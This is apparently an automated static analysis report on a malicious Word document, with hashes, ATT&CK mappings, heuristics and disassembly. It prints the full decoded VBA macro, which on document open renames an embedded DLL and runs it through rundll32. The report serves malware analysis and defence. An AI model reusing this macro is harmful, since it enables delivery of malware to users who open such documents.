Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 543c92f5594f037b…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 1.14 MB
Created: 2021-06-08 08:39:00
Authoring application: Microsoft Office Word
First seen: 2021-06-17
MD5: 02c4f753108081c7f52389a45a7f228d
SHA-1: 5a16a12939a9edd7348aea1e84c2e4601f933b34
SHA-256: 543c92f5594f037bd1e27f9c927bbc1448ed511895a160a686f9e63c30a985c3
Risk Score: 430

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. This macro calls ShellExecuteA through a Declare PtrSafe binding to execute 'rundll32' with arguments pointing to 'omsh.dll', which is likely a dropped payload. The presence of an embedded PE executable and the use of Ole10Native further indicate a malicious intent to deliver and execute a secondary payload.

Heuristics (13)

  • Office EPRINT stream contains EMF object [high, CVE related] OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and counts as Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • PEB access via FS segment (x86) [high] SC_PEB_ACCESS
    Disassembly: x86; validity: code (0.969); 7/7 branch targets land on an instruction boundary (100% coherence)
    0009D404  64a130000000      mov eax, dword ptr fs:[0x30]
    0009D40A  8b4068            mov eax, dword ptr [eax + 0x68]
    0009D40D  c1e808            shr eax, 8
    0009D410  a801              test al, 1
    0009D412  7510              jne 0x9d424
    0009D414  ff7508            push dword ptr [ebp + 8]
    0009D417  ff1574600601      call dword ptr [0x1066074]
    0009D41D  50                push eax
    0009D41E  ff1578600601      call dword ptr [0x1066078]
    0009D424  ff7508            push dword ptr [ebp + 8]
    0009D427  e82d000000        call 0x9d459
    0009D42C  59                pop ecx
    0009D42D  ff7508            push dword ptr [ebp + 8]
    0009D430  ff15e8600601      call dword ptr [0x10660e8]
    0009D436  cc                int3
    0009D437  e8e2100100        call 0xae51e
    0009D43C  83f801            cmp eax, 1
    0009D43F  7415              je 0x9d456
    0009D441  648b0d30000000    mov ecx, dword ptr fs:[0x30]
    0009D448  8b4968            mov ecx, dword ptr [ecx + 0x68]
    0009D44B  c1e908            shr ecx, 8
    0009D44E  f6c101            test cl, 1
    0009D451  7503              jne 0x9d456
    0009D453  b001              mov al, 1
    0009D455  c3                ret
    0009D456  32c0              xor al, al
    0009D458  c3                ret
    0009D459  8bff              mov edi, edi
    0009D45B  55                push ebp
    0009D45C  8bec              mov ebp, esp
    0009D45E  51                push ecx
    0009D45F  8365fc00          and dword ptr [ebp - 4], 0
    0009D463  8d                .byte 0x8d
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
  • Reference to LoadLibrary API [high] SC_STR_LOADLIBRARY
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
  • Ole10Native package carries executable/script file type [high] OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script: Set FSO = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script: Private Sub Document_Open()
  • Reference to VirtualProtect API [medium] SC_STR_VIRTUALPROTECT
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2114 bytes
SHA-256: 919173ba39a62c6a171e4e84e02f9ee0db4d3ea27bb5a206ac7e07964c450503
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text

Private Declare PtrSafe Function gc Lib "shell32" _
    Alias "ShellExecuteA" (ByVal hwnd As Long, _
    ByVal lpOperation As String, ByVal lpFile As String, _
    ByVal lpParameters As String, ByVal lpDirectory As String, _
    ByVal nShowCmd As Long) As Long

Dim hdv As String

Private Sub Document_Open()
    Dim vcbc As String
    vcbc = Options.DefaultFilePath(wdAutoRecoverPath)
    Dim xc
    xc = "texmp"
    If Dir(vcbc & "\omsh.dll") = "" Then
        Call yyy
        Call xxx
        If Len(hdv) > 2 Then
            Call nam(hdv)
            Dim ued As String
            ued = ".exe"
            gc 0, vbNullString, _
                "rundl" & "l32", Options.DefaultFilePath(wdAutoRecoverPath) & "\omsh.dll,TFPWQPUJLMG", _
                vbNullString, 1
        End If
    End If
End Sub

Sub yyy()
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub

Sub xxx()
    Dim usx
    usx = Options.DefaultFilePath(wdTempFilePath)
    Dim FSO As Object
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Call Search(FSO.GetFolder(usx), hdv)
End Sub

Attribute VB_Name = "Module1"
Sub bvcbc()
    Dim fdsf
    fdsf = "ngffds"
End Sub

Sub nam(pafs As String)
    Name pafs As Options.DefaultFilePath(wdAutoRecoverPath) & "\omsh.dll"
End Sub

Sub bcvsf()
    Dim cxv
    cxv = "vdcvdsf"
End Sub

Sub Search(mds As Object, pafs As String)
    Dim Nedc As Object
    For Each Nedc In mds.SubFolders
        Search Nedc, pafs
    Next Nedc
    Dim Ters As Object
    For Each Ters In mds.Files
        If Ters.Name = "omh.dll" Then
            pafs = Ters
        End If
    Next Ters
    Exit Sub
ErrHandle:
    Err.Clear
End Sub
Filename: embedded_office_0008f46e.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x8F46E
Size: 609170 bytes
SHA-256: 7d0eed187b6cdead8f2df01466f2079e8d31880b0ab3e9afd993b2bce2b4c55d
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA
Carved macro source contains an auto-exec entry point and execution/download terms.
Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1684621631/Ole10Native
Size: 576300 bytes
SHA-256: c49a57894e81f5a5d6f9e00b7e5641ec89cc55736587ef9e3b2597c0c77fc38e
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA
Filename: ole10native_00_omh.dll
Kind: ole-package-payload
Source: OLE Ole10Native payload: ObjectPool/_1684621631/Ole10Native; display_name=omh.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\omh.dll; temp_path=; def_file=
Size: 576000 bytes
SHA-256: 061da9f77365d9f1e755080321b22b6931be6ee002bf99215ae5a1083cc25d0c
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA